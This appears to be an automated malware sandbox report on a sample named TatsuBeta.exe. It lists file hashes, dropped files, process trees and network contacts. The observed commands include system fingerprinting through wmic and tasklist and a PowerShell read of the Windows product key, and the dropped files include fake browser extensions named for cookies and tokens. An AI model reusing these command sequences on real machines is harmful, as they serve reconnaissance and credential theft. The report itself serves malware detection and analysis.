SHA256 65e75b3e2d698d205f67f1aa4d49218d0e313b437bbab13fd52b2355eb80fd7d
SHA512 92b7bc616f160d36409aa462225189dda48d6192256b3c716e5b355b05c355be66efe2013a1daa838babcef3c8f5bc9d4cfd01ffb6c3fe0cb1d234843a479ec2

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\D3DCompiler_47.dll

MD5 b2cc388f3aa71f9c3a9503348aeddfac
SHA1 4e413023ce9527819ca91eaec0ac92675d23f268
SHA256 432ef2ec690049327e4d985fd94628300a6c61b0769306524e925482f2ba8f1c
SHA512 7f4f4c1c9c826c076d69af71de7aaf536936256c4d9d5c62a74e0991b402ff34cefe786f6be17dbe5e1870842d41d1070fa42415cdec346aa564228447b99d50

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe

MD5 529be33164d77cdcd0f31c4bb83b4921
SHA1 f8b02ef5d90361e89e0ed82f09ad24b674ea2e19
SHA256 8cb18ac2f1c11b11fe2ede1e9c0723031fa3ddd632051683205d73751af23b88
SHA512 9d558c0e9fa7e4a1df3861f98c13647110ff0aa1e54547dd4ff5fb049a8aa303c9f19f301548e3727e7b4e33b18a9ac8e7929cffeba40c95794b06a7282bfa2c

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\ffmpeg.dll

MD5 91d1c852e8f4468825f6a7a85761938c
SHA1 88dabd22fe7ec5fc184f7b86b1c86803b0462d96
SHA256 a22868e14b1c1ed0b8122c6b46894d8b48d47c22818947354e56f4cad6ee0b11
SHA512 8584331d014443dd4fb4dda35578e1bcb6b4328574bd0633f91fdb8361cb0d551c0c208b5bc928ff9a7c843b23a87070a24fc36483a662110214fe3b7defe5e3

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe

MD5 971ada5e5d2bf3d98e1a94a57dab84e0
SHA1 fd003f21c12f98d3ccfd66e872eebe353b5aadd8
SHA256 eb6f5bcbc0b4410ed2dec27c1945643bc6817162882f36746804eb8ec5c90dc2
SHA512 07b47b65e0758203764f1827a4806f28b3853f30627b91a6a5bb8f369a3777117694e614eae4c49ebccca73ff76cc7b743af5a0298ca3027f4006d93c44b5b11

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_012aogrj.3c4.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3044-609-0x000001BF758E0000-0x000001BF75902000-memory.dmp

memory/3044-612-0x000001BF5B980000-0x000001BF5B990000-memory.dmp

memory/3044-611-0x000001BF5B980000-0x000001BF5B990000-memory.dmp

memory/3044-610-0x00007FFABC460000-0x00007FFABCF22000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 cbf94ff8ad94c5fc6e2e30654f474927
SHA1 20cdcd764a0066cd1ccd8e62fc2d37542a5d0d36
SHA256 4692b0d645a21711746c3237a86a6c732613b81b2939602d8d78285b62b623a0
SHA512 b62cf5d35bfbc34332299409445e0acc596f6b2549e7130ec82665bf4316f1dfd42e57f6f4d5d216a6fc94d5929dec55fb65ede73e8666717d69318af322f276

memory/2644-628-0x00007FFABC460000-0x00007FFABCF22000-memory.dmp

memory/2644-629-0x00000292A3160000-0x00000292A3170000-memory.dmp

memory/2644-632-0x00007FFABC460000-0x00007FFABCF22000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 7ede42e5af61f101ef19de6a68869d0c
SHA1 c396c7496e049b025720409babdb77d646781649
SHA256 63157cf1d6056d84a9c37010f9f6b55b9fcfdd60fe008e46b8618c0946f5394f
SHA512 df74d41ba710d238fcb210b9ec63eafbce02cbc8a6ff94e204a4cd2b330592f6ec0ddb4c488b9b879444d8a4408b0b062f1548b786f0978cff793b7dc607376e

memory/3044-616-0x00007FFABC460000-0x00007FFABCF22000-memory.dmp

memory/1072-649-0x0000015F5D530000-0x0000015F5D540000-memory.dmp

memory/1072-653-0x00007FFABC460000-0x00007FFABCF22000-memory.dmp

memory/5856-655-0x00007FFABC460000-0x00007FFABCF22000-memory.dmp

memory/5856-657-0x00000279C0960000-0x00000279C0970000-memory.dmp

memory/5856-656-0x00000279C0960000-0x00000279C0970000-memory.dmp

memory/5856-667-0x00000279C0960000-0x00000279C0970000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 446dd1cf97eaba21cf14d03aebc79f27
SHA1 36e4cc7367e0c7b40f4a8ace272941ea46373799
SHA256 a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf
SHA512 a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

memory/5856-669-0x00007FFABC460000-0x00007FFABCF22000-memory.dmp

memory/7676-680-0x0000027E71110000-0x0000027E71120000-memory.dmp

memory/7676-683-0x0000027E71110000-0x0000027E71120000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 9b5655b797c26ffc04f79597d8d56eba
SHA1 8b6d6e58ab350bf1c526ed324e523f4f0cf808f0
SHA256 5893e9041f26e97ce9864f245da1211ae2570503facf24a5bb21ee7b858c9548
SHA512 89549717ce4b618fc68df01066d0cc1d3198a94e616fa84e563e5cbcd2f9aae4dff4599d5b8e013ab5e8da798c669dd41751d25f988f729bf8bc8ed0fd9645ae

memory/7676-681-0x0000027E71110000-0x0000027E71120000-memory.dmp

memory/7676-679-0x00007FFABC510000-0x00007FFABCFD2000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ne3ylnyx.default-release\places.sqlite_tmp

MD5 c6f060e048e6ddaf0522e271e4e91978
SHA1 80af0ea60eac0f909a797812d77d65f0f439adad
SHA256 911e17e6dce12841484c4315468f5b2d58a360967ac184b7284ff6846e3fe0e6
SHA512 1ea5e8b0d592842f1ec6ff6fe710ba319940dcf649b45892ea12038883ca3cd96538621f6cc9190834df0c99be6bbf8e9e615d327b20cb4ea833131072dfbb9c

memory/7676-685-0x00007FFABC510000-0x00007FFABCFD2000-memory.dmp

memory/4492-736-0x0000021E6A730000-0x0000021E6A740000-memory.dmp

memory/4492-735-0x0000021E6A730000-0x0000021E6A740000-memory.dmp

memory/4492-748-0x00007FFABC510000-0x00007FFABCFD2000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_LTNxen.vbs

MD5 3048bb46614c1eb07d5f883a207b7363
SHA1 d217a0ab3ff507c68c4095704b57d6ddc020fa48
SHA256 68c493dd10c99b69866b956efbfac41c7956b590294db41bad72550a1b49886e
SHA512 bd8b045ef54eccb1fd07782275af2e66ddc287ee20035dc2135ecd0ae3bcfcfe3b781ecb26a8c6e218f5154509371e9691e6f9b15ac3dce10202d9779bf657f6

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 00b5dac0faabd946e46411c68c4e4b54
SHA1 ebffe4f7312c6a3ea1a5bfb8e36e3716b73a71de
SHA256 ba0bccd5b683d96eda6d4000424147e0dddaa1e6c87dd65566721f4552397133
SHA512 25a291425f8ac169440d5a6250b2eae67261d599bd35aa3e02c742deed5aedea7d4e88910947116068759e3b8cb5fd82c29b6360d86b663fc536b09bd69ac9c0

memory/4676-787-0x0000021A9AB30000-0x0000021A9AB40000-memory.dmp

memory/4676-786-0x0000021A9AB30000-0x0000021A9AB40000-memory.dmp

memory/4676-797-0x0000021A9AB30000-0x0000021A9AB40000-memory.dmp

memory/4676-801-0x00007FFABC510000-0x00007FFABCFD2000-memory.dmp

C:\ProgramData\ChromeExtensionsNova\extension-tokens\images\logo16.png

MD5 192e90432fed0081abb25295d8f309c4
SHA1 5150e93061f39e26688afd60a04c0ab14b510d47
SHA256 3216d6864b4f8824b82eb887edf95436dac3bea3f7d43d8988a176e3f1f8e1b2
SHA512 9b9b3f85eb9f12ad1b4c8cfc5e672758d879e178179deb28e80e6c3b27871261bf6b52f9066850b5a7a2fd85012b5308eaf3dda882fa40febc9cf6b47f1a4f04

C:\ProgramData\ChromeExtensionsNova\extension-tokens\images\logo128.png

MD5 79f41ba1f9731c1bcb922950161750c7
SHA1 68640016af0b51566525ef43461313421f4d4421
SHA256 815b92eb30d52fece010b0fb1095b688a6d25edec9c5379591621981cfbc7d86
SHA512 53daf52b962b6695b73c9c9adf6549db11eb31a3d7cf0f5162979ee708744b33392db1b69c725030f1680cc1ca9fd0812ab834d50f067ac5cf9472f2714d2161

C:\ProgramData\ChromeExtensionsNova\extension-cookies\manifest.json

MD5 04c23766134b234e85cc537b2162efb1
SHA1 45c48d9ca30a4580a682f025cc66331e49f6f158
SHA256 f50f62683347bbca52d7f7de0c877014ae77043753905628644e2d485dfb4900
SHA512 d246f59ad6d6e9fc8d8d88129302d55cb3d2ba7d52496915ee6791fa0576153070af76ea689cc74ccefc36456df749ac5c8f45cb12702961470f202078bfcb3c

C:\ProgramData\ChromeExtensionsNova\extension-tokens\manifest.json

MD5 42ac88deb5c3cfc02fdc1c27319ee067
SHA1 97b1addf35159800b90743fcfbb5505e80f6eb82
SHA256 28486361faff1827fb9f1871529c48efaaf86027592d189afa6f99b14eb3f4bb
SHA512 77c4054a3cf061eb6f4f6e9803b74833a8fb0fe352239b5b47cf39ea5eea8104b9da6deab75018557476fbda856f3be8d57e6fe2eb777c45a7a1bdb1e72d02d5

C:\ProgramData\ChromeExtensionsNova\extension-tokens\js\jquery-3.5.1.min.js

MD5 f9f83ad29d48c055a43727a0f7a4a61e
SHA1 58f1c8b28e59f58813566c89eb15ca1524224d1a
SHA256 6064de9f7f6961cb4670dd18cf6e0640f5ae757c170eb121f66e60d9d59dfa88
SHA512 b44f81f7b883e09eec8a21f7a1bd7a15e4eeb07dcd598e4f99005dc2d8ffc0419bb3a90cc4a9b5f78b9454fcd3fbe0fb68d35f55700e0c570f29e0b1f4dedb44

C:\ProgramData\ChromeExtensionsNova\extension-tokens\images\logo.png

MD5 6f2197cd9bd59406dd974eec498c879f
SHA1 e82a237d0bc26e0451d670e68c3f76a7fe142e27
SHA256 ba6cbc9b6acf0e21a7f35d4efe66d778022bd91f6d1f9096ee8c4abf92e295cc
SHA512 459d47adad814a555e8f957a4fa1ff17005ee9b2326764123a4f56983454d387de0571a591f89859a31db0328b5ec31e20d1174cebaabf8d6566ccd2709e0570

C:\ProgramData\ChromeExtensionsNova\extension-cookies\images\logo48.png

MD5 9f74f11972c3c0b161832ffab541bf31
SHA1 e5841ba20a229cdeab85d30690509e649e848271
SHA256 8b74a0abdd566ffdf15891d6abd3537bffb0abce7f362c737c3de6752e136032
SHA512 b90f13eb65a4dcfdd596a7d9eba7c1ba5eb1a598e51107ce3dca07c0a0025469ab18c9958eff2b36f7e05a23f0d16d7d9d7c2321b8e1f2a456aaa7bec3ced0e8

memory/4888-896-0x000002DB000D0000-0x000002DB001F0000-memory.dmp

C:\Users\Admin\AppData\Roaming\salutyHOe4.ps1

MD5 4fdddf586aed433adb0bfe7362592055
SHA1 a0e31dcb709ccd9e7078529880c66611d7f418ea
SHA256 4e26e8214c7ebcb5afa23bc8f5e545dd9c8a782a7ee1d3d40531cf4ee09fbac0
SHA512 99c4fe58658e487fa54d82d1c041c2af5efdafc98dc1e079d3a250b973a435aef488e334849a0e052f6b99546df6d6518cf43b4d606edf5fc637169000ae2362

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 894afb4ff3cd7ee1f69400e936f8fc9d
SHA1 aa0eb6ac58f8997940c1aa2e6f6c42d7c3837e51
SHA256 20948b37924c58362ffc5d1472667b53c6d7fc865ad541c901cebf41d04a03c9
SHA512 449494468d267f9689a277ce858dac7dfda04ceb568f60170645582fd631901a9ef780da8e420cba8a297edc11cd63a874e3429b95cf90e7261d2b9ab8850e98

memory/4676-785-0x00007FFABC510000-0x00007FFABCFD2000-memory.dmp

memory/4492-734-0x00007FFABC510000-0x00007FFABCFD2000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\TatsuBeta.exe

MD5 fb0c2038a10e8bddddd3f7f512c2dde7
SHA1 30454c337256f08e2a1fae98822ce1ff66f1dbd6
SHA256 385923e026412d8ef833f348d68763dc76281d557c4640a8289bd6c082c244b8
SHA512 97b9cfe1e245fa0ee16a4de73c7431b627caf8111861afc9a6c891aab8e5babe73cfad712ef2139caf2df0faa97993bdca1c1ecc6df16e46ee72616c7946cf3a

memory/1072-650-0x0000015F5D530000-0x0000015F5D540000-memory.dmp

memory/1072-648-0x0000015F5D530000-0x0000015F5D540000-memory.dmp

memory/1072-647-0x00007FFABC460000-0x00007FFABCF22000-memory.dmp

memory/4888-898-0x000002DB000D0000-0x000002DB001F0000-memory.dmp

memory/4888-901-0x000002DB000D0000-0x000002DB001F0000-memory.dmp

memory/4888-902-0x000002DB000D0000-0x000002DB001F0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\ffmpeg.dll

MD5 ea578928fcddad3a740de7f6ef54d80d
SHA1 ed83e8cac4c2535a5b6e828dabe9d8ad34dc3b17
SHA256 101aa9562e3afc3e05234b45a0b80f14ddec0f82feed50b52594837e0e7e564d
SHA512 87ce0f3c58e170a88d01d80d0d2337087120c466acf660d7613be52c74e3e7d5081b445b0036fd5c105cd92cad6b2f7dd9a1a880919ed77f5d4a31038ac5f135

memory/6516-912-0x0000020487B40000-0x0000020487B41000-memory.dmp

memory/6516-911-0x0000020487B40000-0x0000020487B41000-memory.dmp

memory/6516-922-0x0000020487B40000-0x0000020487B41000-memory.dmp

memory/6516-921-0x0000020487B40000-0x0000020487B41000-memory.dmp

memory/6516-920-0x0000020487B40000-0x0000020487B41000-memory.dmp

memory/6516-919-0x0000020487B40000-0x0000020487B41000-memory.dmp

memory/6516-918-0x0000020487B40000-0x0000020487B41000-memory.dmp

memory/6516-917-0x0000020487B40000-0x0000020487B41000-memory.dmp

memory/6516-916-0x0000020487B40000-0x0000020487B41000-memory.dmp

memory/6516-910-0x0000020487B40000-0x0000020487B41000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe

MD5 0819c074278c4a9722e84c572bbd67dc
SHA1 5a294ed6de84a2db24c041f36fb6d24e6633f02e
SHA256 b148f8e138f0afe4c80c8da7fa21e1885b12a9a2a083e4334e6d2952ab13639f
SHA512 e8d0865905071442be1c1fbdcb211e7bf57b76022a774b1b6c648908bdfa8302739e759cec52102ace937b7a8632c9a996fdc7ca84d67eed701ba945f3628b40

memory/4888-925-0x000002DB000D0000-0x000002DB001F0000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2023-12-17 13:47

Reported

2023-12-17 13:51

Platform

win7-20231215-en

Max time kernel

16s

Max time network

123s

Command Line

"C:\Users\Admin\AppData\Local\Temp\TatsuBeta.exe"

Signatures

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A

Enumerates physical storage devices

Collects information from the system

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\TatsuBeta.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2676 wrote to memory of 1500 N/A C:\Users\Admin\AppData\Local\Temp\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 2676 wrote to memory of 1500 N/A C:\Users\Admin\AppData\Local\Temp\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 2676 wrote to memory of 1500 N/A C:\Users\Admin\AppData\Local\Temp\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 2676 wrote to memory of 1500 N/A C:\Users\Admin\AppData\Local\Temp\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 1500 wrote to memory of 2076 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Windows\system32\cmd.exe
PID 1500 wrote to memory of 2076 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Windows\system32\cmd.exe
PID 1500 wrote to memory of 2076 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Windows\system32\cmd.exe
PID 1500 wrote to memory of 1516 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 2076 wrote to memory of 2876 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe

Processes

C:\Users\Admin\AppData\Local\Temp\TatsuBeta.exe

"C:\Users\Admin\AppData\Local\Temp\TatsuBeta.exe"

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\tasklist.exe

tasklist

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe

"C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\script" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=992 --field-trial-handle=1196,20665401116552942,4883157833599330659,131072 --disable-features=PlzServiceWorker,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=2676 get ExecutablePath"

C:\Windows\System32\Wbem\WMIC.exe

wmic process where processid=2676 get ExecutablePath

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\resources\app.asar.unpacked\bind\main.exe"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 session

C:\Windows\system32\net.exe

net session

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "net session"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe

"C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\script" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1568 --field-trial-handle=1196,20665401116552942,4883157833599330659,131072 --disable-features=PlzServiceWorker,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe

"C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\script" --mojo-platform-channel-handle=1600 --field-trial-handle=1196,20665401116552942,4883157833599330659,131072 --disable-features=PlzServiceWorker,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic OS get caption, osarchitecture | more +1"

C:\Windows\System32\Wbem\WMIC.exe

wmic logicaldisk get size

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "echo %NUMBER_OF_PROCESSORS%"

C:\Windows\system32\more.com

more +1

C:\Windows\System32\Wbem\WMIC.exe

wmic OS get caption, osarchitecture

C:\Windows\system32\more.com

more +1

C:\Windows\system32\more.com

more +1

C:\Windows\System32\Wbem\WMIC.exe

wmic cpu get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get name | more +1"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController get name | more +1"

C:\Windows\system32\more.com

more +1

C:\Windows\System32\Wbem\WMIC.exe

wmic PATH Win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get totalphysicalmemory

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic computersystem get totalphysicalmemory | more +1"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic logicaldisk get size"

Network

Country Destination Domain Proto
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 ipinfo.io udp
GB 142.250.200.4:80 www.google.com tcp
US 34.117.186.192:443 ipinfo.io tcp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:443 dns.google tcp

Files

\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\System.dll

\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\nsis7z.dll

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\chrome_100_percent.pak

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\chrome_200_percent.pak

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\d3dcompiler_47.dll

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\ffmpeg.dll

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\icudtl.dat

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\libEGL.dll

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\libGLESv2.dll

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\LICENSES.chromium.html

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\LICENSE.electron.txt

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\snapshot_blob.bin

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\resources.pak

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\TatsuBeta.exe

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\v8_context_snapshot.bin

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\vulkan-1.dll

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\vk_swiftshader_icd.json

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\vk_swiftshader.dll

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\locales\bn.pak

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\locales\bg.pak

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\locales\ar.pak

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\locales\am.pak

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\locales\ca.pak

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\locales\en-GB.pak

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\locales\el.pak

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\locales\de.pak

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\locales\da.pak

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\locales\cs.pak

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\locales\en-US.pak

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\locales\es-419.pak

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\locales\es.pak

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\locales\fa.pak

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\locales\et.pak

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\locales\fil.pak

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\locales\fi.pak

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\locales\fr.pak

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\locales\hi.pak

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\locales\hr.pak

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\locales\he.pak

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\locales\gu.pak

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\locales\it.pak

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\locales\ja.pak

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\locales\id.pak

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\locales\hu.pak

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\locales\ko.pak

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\locales\kn.pak

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\locales\lv.pak

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\locales\lt.pak

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\locales\ml.pak

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\locales\mr.pak

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\locales\nl.pak

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\locales\nb.pak

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\locales\ms.pak

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\locales\ro.pak

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\locales\pt-PT.pak

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\locales\pt-BR.pak

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\locales\pl.pak

